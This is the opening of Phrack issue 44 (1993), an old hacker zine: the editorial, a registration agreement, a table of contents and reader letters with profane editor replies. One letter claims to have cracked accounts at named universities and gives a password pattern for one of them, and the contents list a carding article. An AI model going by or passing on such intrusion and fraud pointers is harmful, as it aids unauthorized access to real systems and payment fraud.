home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / Phrack / Phrack Issue 44.sit / Phrack Issue 44 next >
Text File  |  1997-06-06  |  863KB  |  19,182 lines

  1.                               ==Phrack Magazine==
  2.  
  3.                    Volume Four, Issue Forty-Four, File 1 of 27
  4.  
  5.                                  Issue 44 Index
  6.                               ___________________
  7.  
  8.                                P H R A C K   4 4
  9.  
  10.                                November 17, 1993
  11.                               ___________________
  12.  
  13.                        ~ Your skill is extra ordinary ~
  14.  
  15. Happy Birthday to Phrack, Happy Birthday to Phrack, Happy Birthday
  16. Happy Birthday, Happy Birthday to Phrack.  November 17th, 1993 marks
  17. the eighth year of Phrack Magazine.  Amazing, ain't it?  Seems like
  18. only a few years.  Makes me feel old.  Damn.
  19.  
  20. I have been a busy boy since I put out 43.  I've been to Boston,
  21. Amsterdam, Las Vegas, Philadelphia, and numerous points in between.
  22. I've been slaving at the day job, consulting and speaking about
  23. security on the side, working on other ventures you could not
  24. possibly conceive of without proper initiation, and piecing together
  25. this magazine.  (Listening for applause)
  26.  
  27. It's a big pain in the butt to do a magazine like this, especially
  28. when people who SAY they are going to write something, don't.  I know,
  29. it's a typical hacker cop-out to start something and then get
  30. side-tracked by other projects.  I'm as guilty of that as is any of
  31. you, but I'm trying to get better.  So should those of you who are
  32. hiding your faces in shame...you know who you are.
  33.  
  34. Every day I get bombarded with "When's the next Phrack coming out?"
  35. It started the day I released 43 on IRC.  THE SAME DAY!  43 hadn't even
  36. gone out over the mailing list yet, and people were already asking
  37. when the next one was due out!  I know they didn't read all 1.2
  38. megs of 43 before they started in on me.  Geez, that gets old.
  39. For those of you who ever consider asking me such a thing, the answer
  40. is, "When it's done."
  41.  
  42. Alas, still no new corporate registrations.  A few people
  43. have expressed an interest, but never followed through.
  44. We have gotten a number of non-corporate registrations from
  45. people who I guess just wanted to send me mail.  Listen
  46. guys, I love to hear from you all, but unless you are a corporate,
  47. federal, or law enforcement reader complying with our registration
  48. requirements and paying the fee, you don't have to send in the form.
  49.  
  50. We've got a few nifty things in this issue.  Phrack never really
  51. included much more than text.  Last month's inclusion of the Novell
  52. utilities uuencoded was a departure from the norm, and I decided to
  53. do somthing like that again.  In this issue you will find a small
  54. photo collection that might make you smile.
  55.  
  56. If you can't figure out how to use uudecode, I suggest
  57. you close this file, and spend a few moments perusing the man page
  58. entries on that command, or consulting a good book on unix.  And
  59. for you whiners that don't have accounts on UNIX boxes, uuencode
  60. and uudecode programs are available for DOS, Mac, Amiga and
  61. virtually any platform you care to use.  (Although if you are using
  62. MVS, CICS, TSO or 400/OS, you reap what you sow.)
  63.  
  64. A lot of conferences went on during the time that has passed since our
  65. last issue.  It's nice to see that the community is making itself
  66. a louder voice in the world, although seeing the word "Cyber" on
  67. nearly every magazine in the Western Hemisphere is making me
  68. rather nauseous, and if Billy Idol gets on another TV show (aside from
  69. The Hollywood Squares, which would mean his career was OVER)
  70. I may have to sell everything electronic I own.  Hell, there
  71. was even hacking on Melrose Place.  Anyway, back to the point, as is
  72. the case with every gathering, we've got it covered.
  73.  
  74. You might notice that there are a lot of files dealing with people
  75. and places rather than strictly items of hardcore technical info.
  76. I know some may disagree with me, but I really feel that its
  77. important to document and chronicle things that relate to the
  78. personalities of this community.  I mean, how entertaining is it
  79. to read "HOW TO HACK TOPS-20" ten years later?
  80.  
  81. Don't get me wrong and think we're not dealing with anything meaty.
  82. This issue we've also got operating system guides, cell & bell stuff,
  83. Van Eck info, and MORE MORE MORE.
  84.  
  85. Phrack 44.  It's out.  Now leave me alone.  :)
  86.  
  87. -------------------------------------------------------------------------
  88.  
  89.                         READ THE FOLLOWING
  90.  
  91.                 IMPORTANT REGISTRATION INFORMATION
  92.  
  93. Corporate/Institutional/Government:  If you are a business,
  94. institution or government agency, or otherwise employed by,
  95. contracted to or providing any consultation relating to computers,
  96. telecommunications or security of any kind to such an entity, this
  97. information pertains to you.
  98.  
  99. You are instructed to read this agreement and comply with its
  100. terms and immediately destroy any copies of this publication
  101. existing in your possession (electronic or otherwise) until
  102. such a time as you have fulfilled your registration requirements.
  103. A form to request registration agreements is provided
  104. at the end of this file.  Cost is $100.00 US per user for
  105. subscription registration.  Cost of multi-user licenses will be
  106. negotiated on a site-by-site basis.
  107.  
  108. Individual User:  If you are an individual end user whose use
  109. is not on behalf of a business, organization or government
  110. agency, you may read and possess copies of Phrack Magazine
  111. free of charge.  You may also distribute this magazine freely
  112. to any other such hobbyist or computer service provided for
  113. similar hobbyists.  If you are unsure of your qualifications
  114. as an individual user, please contact us as we do not wish to
  115. withhold Phrack from anyone whose occupations are not in conflict
  116. with our readership.
  117.  
  118. _______________________________________________________________
  119.  
  120. Phrack Magazine corporate/institutional/government agreement
  121.  
  122.    Notice to users ("Company"):  READ THE FOLLOWING LEGAL
  123. AGREEMENT.  Company's use and/or possession of this Magazine is
  124. conditioned upon compliance by company with the terms of this
  125. agreement.  Any continued use or possession of this Magazine is
  126. conditioned upon payment by company of the negotiated fee
  127. specified in a letter of confirmation from Phrack Magazine.
  128.  
  129.    This magazine may not be distributed by Company to any
  130. outside corporation, organization or government agency.  This
  131. agreement authorizes Company to use and possess the number of copies
  132. described in the confirmation letter from Phrack Magazine and for which
  133. Company has paid Phrack Magazine the negotiated agreement fee.  If
  134. the confirmation letter from Phrack Magazine indicates that Company's
  135. agreement is "Corporate-Wide", this agreement will be deemed to cover
  136. copies duplicated and distributed by Company for use by any additional
  137. employees of Company during the Term, at no additional charge.  This
  138. agreement will remain in effect for one year from the date of the
  139. confirmation letter from Phrack Magazine authorizing such continued use
  140. or such other period as is stated in the confirmation letter (the "Term").
  141. If Company does not obtain a confirmation letter and pay the applicable
  142. agreement fee, Company is in violation of applicable US Copyright laws.
  143.  
  144.     This Magazine is protected by United States copyright laws and
  145. international treaty provisions.  Company acknowledges that no title to
  146. the intellectual property in the Magazine is transferred to Company.
  147. Company further acknowledges that full ownership rights to the Magazine
  148. will remain the exclusive property of Phrack Magazine and Company will
  149. not acquire any rights to the Magazine except as expressly set
  150. forth in this agreement.  Company agrees that any copies of the
  151. Magazine made by Company will contain the same proprietary
  152. notices which appear in this document.
  153.  
  154.     In the event of invalidity of any provision of this agreement,
  155. the parties agree that such invalidity shall not affect the validity
  156. of the remaining portions of this agreement.
  157.  
  158.     In no event shall Phrack Magazine be liable for consequential, incidental
  159. or indirect damages of any kind arising out of the delivery, performance or
  160. use of the information contained within the copy of this magazine, even
  161. if Phrack Magazine has been advised of the possibility of such damages.
  162. In no event will Phrack Magazine's liability for any claim, whether in
  163. contract, tort, or any other theory of liability, exceed the agreement fee
  164. paid by Company.
  165.  
  166.     This Agreement will be governed by the laws of the State of Texas
  167. as they are applied to agreements to be entered into and to be performed
  168. entirely within Texas.  The United Nations Convention on Contracts for
  169. the International Sale of Goods is specifically disclaimed.
  170.  
  171.     This Agreement together with any Phrack Magazine
  172. confirmation letter constitute the entire agreement between
  173. Company and Phrack Magazine which supersedes any prior agreement,
  174. including any prior agreement from Phrack Magazine, or understanding,
  175. whether written or oral, relating to the subject matter of this
  176. Agreement.  The terms and conditions of this Agreement shall
  177. apply to all orders submitted to Phrack Magazine and shall supersede any
  178. different or additional terms on purchase orders from Company.
  179.  
  180. _________________________________________________________________
  181.  
  182.             REGISTRATION INFORMATION REQUEST FORM
  183.  
  184.  
  185. We have approximately __________ users.
  186.  
  187. Enclosed is  $________
  188.  
  189. We desire Phrack Magazine distributed by (Choose one):
  190.  
  191. Electronic Mail: _________
  192. Hard Copy:       _________
  193. Diskette:        _________  (Include size & computer format)
  194.  
  195.  
  196. Name:_______________________________  Dept:____________________
  197.  
  198. Company:_______________________________________________________
  199.  
  200. Address:_______________________________________________________
  201.  
  202. _______________________________________________________________
  203.  
  204. City/State/Province:___________________________________________
  205.  
  206. Country/Postal Code:___________________________________________
  207.  
  208. Telephone:____________________   Fax:__________________________
  209.  
  210.  
  211. Send to:
  212.  
  213. Phrack Magazine
  214. 603 W. 13th #1A-278
  215. Austin, TX 78701
  216. -----------------------------------------------------------------------------
  217.  
  218.  
  219. Enjoy the magazine.  It is for and by the hacking community.  Period.
  220.  
  221.  
  222.       Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans)
  223.                 3L33t : CERT  (not)
  224.                  News : Datastream Cowboy
  225.           Photography : dFx
  226.       Three People KL
  227.    Says "Never Trust" : Erik Bloodaxe, Dispater, Control C
  228.              Dead Guy : River Phoenix
  229.     Prison Consultant : Co / Dec
  230.    Gamblers Anonymous : KevinTX
  231.        Takes Too Long
  232.       To Make Xeroxes : Count Zero
  233.        Group To Watch : PoP/FoF
  234.                 Dazed : Weevil
  235.                Typist : DDS
  236.               My Hero : Lazlo Toth
  237.             Thanks To : The Grimmace, Agent 005, Iceman
  238.                         Herd Beast, Al Capone, Synapse,
  239.                         Opticon the Disassembled, Holz,
  240.                         Gurney Halleck, Dark Tangent, Visionary
  241.                         Paco @ Fringeware, VaxBuster
  242.                         Larry Kollar, Sara Gordon, Kohntark,
  243.                         FyberLyte, InterPACT Press, Netsys,
  244.                         The WELL, MOD, Gail, Hack-Tic.
  245.  
  246. "Aitsu, satsu ni tarekondari shitara bukkoroshite yaru!"
  247.   -- A Paranoid Haiteku-Otaku
  248.  
  249. Phrack Magazine V. 4, #44, November 17, 1993.     ISSN 1068-1035
  250. Contents Copyright (C) 1993 Phrack Magazine, all rights reserved.
  251. Nothing may be reproduced in whole or in part without written
  252. permission of the Editor-In-Chief.  Phrack Magazine is made available
  253. quarterly to the amateur computer hobbyist free of charge.  Any
  254. corporate, government, legal, or otherwise commercial usage or
  255. possession (electronic or otherwise) is strictly prohibited without
  256. prior registration, and is in violation of applicable US Copyright laws.
  257. To subscribe, send email to phrack@well.sf.ca.us and ask to be added to
  258. the list.
  259.  
  260.                     Phrack Magazine
  261.                     603 W. 13th #1A-278       (Phrack Mailing Address)
  262.                     Austin, TX 78701
  263.  
  264.                     ftp.netsys.com            (Phrack FTP Site)
  265.                     /pub/phrack
  266.  
  267.                     phrack@well.sf.ca.us      (Phrack E-mail Address)
  268.  
  269. Submissions to the above email address may be encrypted
  270. with the following key : (Not that we use PGP or encourage its
  271. use or anything.  Heavens no.  That would be politically-incorrect.
  272. Maybe someone else is decrypting our mail for us on another machine
  273. that isn't used for Phrack publication.  Yeah, that's it.   :) )
  274.  
  275. -----BEGIN PGP PUBLIC KEY BLOCK-----
  276. Version: 2.3a
  277.  
  278. mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy
  279. ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi
  280. a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR
  281. tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg==
  282. =q2KB
  283. -----END PGP PUBLIC KEY BLOCK-----
  284.  
  285.  
  286.   -= Phrack 44 =-
  287.  Table Of Contents                                       Approx. Size
  288.  ~~~~~~~~~~~~~~~~~                                       ~~~~~~~~~~~~
  289.  1.  Introduction by The Editor                               16K
  290.  2.  Phrack Loopback / Editorial                              57K
  291.  3.  Line Noise Part I                                        51K
  292.  4.  Line Noise Part II                                       35K
  293.  5.  Computer Cop Prophile by The Grimmace                    22K
  294.  6.  Conference News Part I by Various Sources                55K
  295.  7.  Conference News Part II by Various Sources               35K
  296.  8.  Conference News Part III by Various Sources              50K
  297.  9.  Intro to Packet Radio by Larry Kollar                    16K
  298.  10. The Moeller Papers                                       30K
  299.  11. Sara Gordon v. Kohntark Part I                           12K
  300.  12. Sara Gordon v. Kohntark Part II                          47K
  301.  13. Northern Telecom's FMT-150B/C/D by FyberLyte             16K
  302.  14. A Guide to Data General's AOS/VS Part I by Herd Beast    46K
  303.  15. A Guide to Data General's AOS/VS Part II by Herd Beast   50K
  304.  16. An Interview With Agent Steal by Agent 005               14K
  305.  17. Visionary - The Story About Him by Visionary             23K
  306.  18. Searching The Dialog Information Service by Al Capone    48K
  307.  19. Northern Telecom's SL-1 by Iceman                        30K
  308.  20. Safe and Easy Carding by VaxBuster                       18K
  309.  21. Datapac by Synapse                                       36K
  310.  22. An Introduction to the Decserver 200 By Opticon          16K
  311.  23. LOD Communications BBS Archive Information               29K
  312.  24. MOD Family Portrait                                      35K
  313.  25. Gail Takes A Break                                       49K
  314.  26. International Scenes by Various Sources                  25K
  315.  27. Phrack World News by Datastream Cowboy                   22K
  316.  
  317.                                                     Total:   882K
  318.  
  319.      People who don't get the picture:
  320.  
  321.      "Clipper products may not be usable around the world."
  322.      (NIST Advisory Board, August, 1993)
  323.  
  324.      "Coin stations not served by the TSPS/TOPS ACTS system are
  325.      subject to considerable fraud and operating expense."
  326.      (TE&M, p. 58, September 1, 1993)
  327.  
  328.      " 'Our basic objective is to detect toll-fraud and prevent customers
  329.      from suffering large losses,' said AT&T's (Karen) Pepe. 'We're
  330.      just trying to stay ahead of the curve.'"
  331.      (Telephony, p. 13, August 30, 1993)
  332.  
  333.      People who get the picture:
  334.      
  335.      "I don't like things that suck."
  336.      (Butthead, to Beavis, Every Day, 1993)
  337.  
  338. _______________________________________________________________________________
  339.                               ==Phrack Magazine==
  340.  
  341.                  Volume Four, Issue Forty-Four, File 2 of 27
  342.  
  343. ****************************************************************************
  344.  
  345.                                 Phrack Loopback
  346.  
  347. Hey,
  348.  
  349. Well, Im trying to set up a BBS here in small little old northeast pa, and
  350. I'm wondering if there is any way I could post the issues of phrack on it.
  351.  
  352. I've gotten some issues from MindVOX and loved em.  Thought others would
  353. like em.  Please send mail back.
  354.  
  355. the soon to be SySop of LLD.
  356. Rebls
  357.  
  358. [I have no problems with people putting copies of Phrack online
  359.  on bbses for others to download, as long as they stay complete, and
  360.  as long as you are not charging your users for access to download
  361.  the files.  If you are, you are a business, and if you're planning on
  362.  making money off of Phrack, you better email me right away.  :) ]
  363.  
  364. -------------------------------------------------------------------------------
  365.  
  366. Control-Alt-Delete
  367. INSOC Network Newsletter
  368.  
  369. Information Society is coming back with a harder, more alternative edge.
  370.  
  371. 16 pg magazine format, quarterly, $5.  Strongly supported by Kurt Harland,
  372. lead singer.  Back issues, merchandise available.
  373.  
  374. Issue #3 - October 1.  Join the Network!
  375.  
  376. Control-Alt-Delete
  377. 5822 Green Terrace Lane
  378. Houston, TX 77088-5414
  379. 713/448-3815
  380. JBeck@AOL.COM
  381.  
  382. [Here's a plug for a nifty little 'zine.  It's amazing how much stuff
  383.  someone can put out about Information Society.  Definitely a must for
  384.  the hardcore INSoc fan.]
  385.  
  386. -------------------------------------------------------------------------------
  387.  
  388. I consider myself pretty much an "individual" and an "end user," but
  389. I just recently contracted with Mesa State College (of Colorado) to write a
  390. simple computer program to organize the tool bin for the vocational
  391. technology department.  Does this make me a computer consultation contractee
  392. of a government, business, or organization?  Now that I think of it, the
  393. program is designed to keep track of tools so that students don't walk off
  394. with them, so that further makes me a "SECURITY computer consultation
  395. contractee."  Geez.  I didn't realize what an important job I had, nor how
  396. I am part of the global conspiracy of "computer professionals" to rip
  397. people off.
  398.  
  399. Hm.
  400.  
  401. What to do, what to do...  Well I guess in the spirit of Phrack magazine,
  402. and ignoring the entirely hypocritical and pointless posturing that you have
  403. engaged in recently, I will go ahead and read it DESPITE the very sternly
  404. worded Copyright Warning which you have so prominently placed in file number
  405. one.  If you feel that the information presented in Phrack 43 should be kept
  406. from certain types of people, and if you are frustrated by the fact that these
  407. people seem to be getting access to the information even when you have a LAW
  408. against it...  Well.. "Tough shit."
  409.  
  410. Bryce
  411.  
  412. [Bryce:
  413.  
  414.  The "entirely hypocritical and pointless posturing" that we have engaged
  415.  in is to prove a point.  A point that is obviously "beneath" you
  416.  as you have missed it entirely.
  417.  
  418.  Phrack has been, and always will be free.  The copyright notice
  419.  is to ensure that Phrack is not sold by third parties.  The registration
  420.  notice is only applicable to certain parties whose interests may be
  421.  opposite those of Phrack Magazine.  As you probably realize, it
  422.  is up to the INDIVIDUAL to decide whether or nor they register.  Most
  423.  corporate/law enforcement/security officials chose not to, hence,
  424.  they are guilty of the same thing they accuse hackers of.
  425.  
  426.  Now, this aside, I think your letter was real shitty, and you came off like
  427.  a smarmy dickhead.  I personally could care less if you read the magazine
  428.  or wipe your ass with it.  Its up to you.  The information is provided
  429.  for EVERYONE to do with whatever the hell the like.
  430.  
  431.  If my attitude is contrary to what you feel is "the spirit" of Phrack,
  432.  well... Tough Shit.]
  433.  
  434. -------------------------------------------------------------------------------
  435.  
  436. Greetings,
  437.  
  438. After reading/hearing about PHRACK, 2600 and others I was pleased to
  439. finally receive the latest issue of Phrack.  I have a few questions and
  440. suggestions to make:
  441.  
  442.         + I have an idea for an article and would like very much to
  443.         contribute it to Phrack.  How do I go about this?  Does the article
  444.         have to be in any particular format?  Would it be a good idea to
  445.         have submission details in every issue?
  446.  
  447.         + Is it possible to submit an article to both Phrack and 2600?
  448.         Would it go against me if I did so?
  449.  
  450.         + I have heard of a zine similar to 2600, but specifically for the
  451.         UK.  I think it might be called 2800?  Is it still going?  And how
  452.         do I get a hold of or in touch with it?
  453.  
  454.         + With regards to your compilation of phone numbers of dialups
  455.         to universities in the States, I have been trying for a year or
  456.         so to compile a similar list specifically for the UK.  It has
  457.         been a bit difficult since those lovely people at the JNT dont
  458.         like this sort of information being compiled.  (Despite the fact
  459.         you can probably walk into any Computer Centre at a site and pick
  460.         up a free news letter containing such information ;-).  Anyway, if
  461.         any UK readers would like to help me in this task, I would very
  462.         much appreciate it.
  463.  
  464. And Keep up the good work!
  465.  
  466. [I'll handle all of this in the order you asked:
  467.  
  468.         1)  Submissions to phrack can be thru email at our well address
  469.         phrack@well.sf.ca.us, or can be mailed via US mail to
  470.         Phrack Magazine, 603 W. 13th #1A-278, Austin, TX, 78701.
  471.         They don't have to be in any specific format (Style-wise) or
  472.         on any particular type of media.  I can read almost anything
  473.         for almost any type of computer.
  474.  
  475.         2)  You can certainly send your work to both Phrack and 2600.
  476.         I would ask that if you do so, please indicate it to both
  477.         myself and Emmanuel Goldstein of 2600 that you have sent it
  478.         to both magazines.  I don't want anyone ragging on me for
  479.         "ripping of 2600" by publishing something they did, as our
  480.         schedules are about a month apart.
  481.  
  482.         3)  I have never heard of 2800.  Perhaps our readers have.
  483.  
  484.         4)  I will make sure to forward any UK dialups I get to
  485.         you for any readers who send them in.  I do want to
  486.         publish your list once you get it compiled though.]
  487.  
  488. -------------------------------------------------------------------------------
  489.  
  490. I am currently in the final stages of writing my magna thesis in History
  491. here at the University of Minnesota.  Over the past 6 months or so I have
  492. been looking at the whole Neidorf/Riggs fiasco and have decided to do a
  493. characterization piece about the Prophet.  Bruce Sterling
  494. directed me towards you as someone who could give me some personal
  495. information on Riggs (His appearance, attitude, and even obscure things
  496. such as habits and behaviors).  From past experience, I have seen that
  497. this information is absolutely necessary in writing these types of
  498. "unconventional" histories.
  499.  
  500. Because I have never met the guy or even seen a picture of him, I must rely
  501. on people like yourself who may have met him or may know people who have known
  502. him.  If you can help me by directing me towards people who have known him
  503. in the past or currently know him, it would be greatly appreciated.  I
  504. really don't want to bother Riggs (and even if I did, I probably would not
  505. get much out of any encounter).
  506.  
  507. Thanks in advance.
  508.  
  509. Jason W. Esser
  510.  
  511. [I'm sorry, but I really can't help you in that respect.
  512.  
  513.  I would suggest you talk to Rob if you want to write about him.
  514.  Or at a minimum Frank or Adam.  They are all very easy to contact.
  515.  Try directory assistance.]
  516.  
  517. **He writes back**
  518.  
  519. THANKS!  You have been EXTREMELY helpful in furthering research into the
  520. CU!  You are a man of great genius and integrity.  Jerk.
  521.  
  522. Jason W. Esser
  523.  
  524. [Jerk?
  525.  
  526.  You, a stranger, write me and want to know the details about a friend of
  527.  mine, without even having the courtesy to let HIM know that
  528.  you are doing such a thing?
  529.  
  530.  What would YOU think if someone out of the fucking blue phoned you
  531.  up and asked for information about someone you knew, under the guise
  532.  of some kind of psychological profile, and wanted to know
  533.  what they looked like, personality quirks, etc...
  534.  
  535.  What you are doing has NO RELATIVE MERIT TO THE COMPUTER UNDERGROUND.
  536.  In fact, I find it intrusive and repulsive.  I am not some kind of
  537.  fucking clearing house for information about people I know.  Try
  538.  his prosecutors for that.  Of, if you had any balls at all, you
  539.  could call Atlanta directory assistance and get phone numbers for
  540.  Riggs, Darden and Grant.
  541.  
  542.  Since you've been such a dick, I suppose I'll call them myself and
  543.  let them know that someone is trying to get personal information
  544.  about at least one of them.  I'm sure they will be thrilled.
  545.  
  546.  So, as for my great genius, you should have asked me questions about
  547.  UNIX...you would have gotten a much more thorough reply.
  548.  
  549.  Asshole.]
  550.  
  551. -------------------------------------------------------------------------------
  552. I would like to make my point in e-mail that I do not wish my
  553. program, ISS (Inet Security Scanner), to be in Phrack.
  554.  
  555. Thank you.
  556.  
  557. Christopher William Klaus
  558.  
  559. [I would just like to make my point in e-mail that I do not give a shit
  560.  about your program ISS (Inet Security Scanner), and it is not
  561.  going to be in Phrack.]
  562.  
  563. -------------------------------------------------------------------------------
  564. Hello, This message desires an urgent reply-thank you
  565.  
  566. Recently a friend of mind came into some electronic trouble of sorts.  I
  567. was wondering if it would be possible to obtain a list and an immediate
  568. way to contact lawyer(s) who specialize in such cases.  Such as the lawyer
  569. who represented the infamous E911 case.  As you could imagine, time is of
  570. essence.  Thank you in advance for a quick reply.
  571.  
  572. Shadowvex...
  573.  
  574. [Depending upon where your friend is, and what he/she has done
  575.  there are a number of people to talk to.
  576.  
  577.  If it is a case that may involve issues of constitutionality
  578.  he should call Mike Godwin at the EFF.  (godwin@eff.org)
  579.  Or may want to contact a local ACLU office.
  580.  
  581.  If he just wants to talk to a lawyer who MIGHT offer him some
  582.  advice on criminal matters he could try Steve Ryan
  583.  (blivion@zero.cypher.com)
  584.  
  585.  Craig Neidorf's lawyer probably would not be
  586.  interested in taking such a case, unless it would pay him well
  587.  and was in the Midwest.
  588.  
  589.  Remember, if your friend got busted hacking, lawyers aren't going
  590.  to help much.]
  591.  
  592. -------------------------------------------------------------------------------
  593.  
  594. I recently learned that when a prank caller calls you on a USDETEST
  595. DIRECT telephone all you have to do is hang up the phone and then pick
  596. it up again, then hit '*57' and hang up.
  597.  
  598. This logs the prank callers info into the phone company's computer
  599. so that if he persists, they have proof of his deeds.  After 5-6 prank calls
  600. and logging them every time, you may call the phone co. and demand that
  601. they give you the prank caller's name, and phone number.  You may also have
  602. the police notified of the prank caller's address, for severe cases.
  603.  
  604. After 5 logs of the activity, the phone co. is required by law to
  605. give you the person's information.  We used it when my aunt was getting
  606. a silent caller last month.
  607.  
  608. [I hope you know that each time you use the Call-Trace feature you
  609.  get billed for it.  Most modern places have that feature and
  610.  many of the other custom calling feature upgrades like caller id
  611.  implemented now a days.]
  612.  
  613. -------------------------------------------------------------------------------
  614.  
  615. Hey is phrack still alive?  Also, do you know the whereabouts of Full Disclosure
  616. magazine and Hack-Tic the Dutch magazine?  If so do you have the phone number
  617. and address to them?
  618.  
  619. Plus, do you know any other mags, that's supports hacker/computer virus (for
  620. IBM, MAC, and AMIGA) cracker, anarchy and phreak information?  I have the 2600.
  621. Are there others our there?
  622.  
  623. [Phrack is still alive.  Notice this response.  That should be proof.
  624.  Hack-Tic is easily reached by mailing the editor
  625.  rop@hacktic.nl
  626.  
  627.  Full Disclosure has no phone.
  628.  Full Disclosure
  629.  P.O. Box 903
  630.  Libertyville, IL 60048
  631.  
  632.  There really aren't any other "hacker" mags.  Full Disclosure isn't one
  633.  by the way.  Hack-tic is entirely in Dutch, so unless you speak Dutch
  634.  it won't do you much good.  There are a few mags that kinda cover the whole
  635.  net scene, like Boing Boing, Gray Areas, etc...there was a big list of cool
  636.  magazines in the Line Noise section of Phrack 43.]
  637.  
  638. -------------------------------------------------------------------------------
  639.  
  640. If possible, I'd like to include an ad for my system in Phrack:
  641.  
  642. ][-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-][
  643.                      Silicon Valley
  644. Home of Freedom       2o4-669-7983       Phalcon/Skism Canada
  645. cDc Global Domination  1 N0de, 24oo 0nLY!    Northern Phun Co.
  646. Factury Direct Outlet      2 3l33t for U!          Dist. Site
  647.  
  648. S00per 3l33t UUCP Mail (silicon.bison.mb.ca), N0 k0dez, war3z, ansi
  649.  
  650. **** Thousands of the m0st eut1mat3-sp1ffy-krad3st Tf1l3s ar0und! ****
  651.  
  652. Freedom,Phrack,cDc,PHUN,LoD,Cud,NSA,ATI,NIA,ANE,Chaos,uXu,AOTD,Chalisti,
  653. CERT,CIAC,DDN,LOL,40HEX,Iformatik,NFX,FBI,NuKE,Phantasy,Worldview,NARC,
  654. PPP,Telecom Archives,EFF,DFP,Legal Papers,CPI,Vindicator Productions,DoA,
  655. Virii,ource C0de,Scanners,Hackers,Cell Fraud,AWA,UN*X Security/Crackers,
  656. Anarkey,ArcV,Trident,Phalcon/Skism,Summercon GIFS,RL,RDT,Syndicate,UPI,
  657. Encryption,PGP,Networking,Radio Modification,Virus S0urce,USEnet,Email.
  658.         The latest news in the hp and telecom community!
  659.          To apply, type 'apply' at the 'local >' prompt
  660.          for questions, mail iceman@silicon.bison.mb.ca
  661.  
  662. ][-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-][
  663.  
  664. -------------------------------------------------------------------------------
  665.  
  666. Two boys were charged with attempted murder for allegedly stuffing a
  667. 3-year-old down a Chicago high-rise building's trash chute, police said.
  668. The boys, ages 11 and 13 were charged with aggravated battery and
  669. attempted murder.  The 3-year-old fell six floors but his fall was
  670. broken by a pile of trash.  He was rescued by a custodian who saw his feet
  671. and turned off a trash compactor just before it would have crushed him,
  672. police said.
  673.  
  674. yeah, sign me up.
  675. thanks.
  676.  
  677. [I have got to say, this was the weirdest subscription request I've gotten
  678.  to date.]
  679.  
  680. -------------------------------------------------------------------------------
  681.  
  682. " To the free flow of information, the life-blood of a prosperous society "
  683.                                By
  684.               The Philosophical Phreaker (a.k.a King Blutto)
  685.  
  686. Introduction:  Don't confuse me with KING BLOTTO in any way...  The idea
  687. behind my name is -- THe man is gone, but let the legend live on.
  688.  
  689. Univeristy of South Florida <-- One of the easiest target that I have
  690. ever come across... The worst security ever.  Thanks goes to Hiawatha for
  691. some of the information.
  692. Just to prevent any loozer from using this information I am not including
  693. the address of this particular sight.  If you are "mildly" qualified you
  694. can find the address...  Anywaz, here are some account that I have found
  695. using the UNIX password hacker programs.  I am also including the password
  696. file so all you bad-boyz, can use your 250,000 word dictionaries and beat
  697. the crap out of this system.
  698.  
  699. [1500 line /etc/passwd file deleted]
  700.  
  701. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  702.  
  703. Southern Methodist Univeristy
  704. First of all, I must congragulate the operators of this system. There security
  705. was "almost" impregnable.  With an abundance of traps.. It made attempts to
  706. identify its callers, and if it could not identify its callers it would
  707. disconnect.  This system was a little bit of challenge, I am again
  708. including the password file for you'll to hack as many account as you want.
  709. Since I don't have an abudance of accounts on this system, I will only
  710. give you a hint on how the passwords work.
  711. Hint:  Most password are like <lastname>123
  712. Go for it guyz.
  713.  
  714. [1200 line /etc/passwd file deleted]
  715.  
  716. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  717. Regards: Lex Luthor, The Ozone, Hiawatha, StolenProcess, Mark Zero and all
  718.          you guyz who were on the The Atmosphere!
  719.  
  720. [Ok, first off, THIS IS NOT SOMETHING TO SUBMIT TO PHRACK.  This is something
  721.  to submit to CERT.
  722.  
  723.  What the hell were you thinking?
  724.  
  725.  Anyone can get their own fucking password files man.  And beyond that,
  726.  if you still need a password file to get into a system, then you need to
  727.  go read a few books on tcp/ip.
  728.  
  729.  People, please don't send Phrack this kind of bullshit.  This piece of mail
  730.  was about 250K.  It was a worthless piece of shit, and only wasted time
  731.  and energy for everyone involved.
  732.  
  733.  And get a new handle.  Blotto would probably kick your ass for being so
  734.  lame and having a handle so close to his.  :)  ]
  735.  
  736. -------------------------------------------------------------------------------
  737.  
  738. A warm welcome from across the sea from myself, and I'm sure on behalf of
  739. all the other hackers/phreakers who are in Great Britain.
  740.  
  741.         After reading about HoHoCon in #42, I would really appreciate it if
  742. you could assist me in getting hold of the following:
  743.  
  744. a) When bootleg gave his presentation he handed out a diskette containing
  745.    information on reprogramming cellular phones... I would dearly love to
  746.    have a copy of this information.
  747.  
  748. b) Also on the subject of HoHoCon, I would like to get in touch with Jim
  749.    Carter, or, have a look at any notes/information that he handed out
  750.    regarding 'tempest' electronic eavesdropping.
  751.  
  752. Thanks, -> The Operator <-
  753.  
  754. [Bootleg's file is called BOOTLEG.ZIP and I'm almost 98% sure that its
  755.  somewhere on zero.cypher.com's ftp site.  If it isn't I'll try to put
  756.  it there.
  757.  
  758.  Jim Carter is in Houston, Texas and can be reached at 713-568-8408
  759.  or 7035 Highway 6, S. #120, Houston, TX 77083.  Jim didn't really hand
  760.  anything out at HoHoCon, but if you were to call him, he MIGHT be able
  761.  to direct you somewhere.  He's a good guy, but this is his JOB so don't
  762.  expect him to give anything away.]
  763.  
  764. -------------------------------------------------------------------------------
  765.  
  766. 'lo,
  767.  
  768.     I was just wondering if there's any way I can subscribe to your 'zine,
  769. I can't subscribe through the method in phrack 39 because I send Internet
  770. mail through the Cserve - Internet gateway and compuserve can't accept
  771. messages with no subject.
  772.  
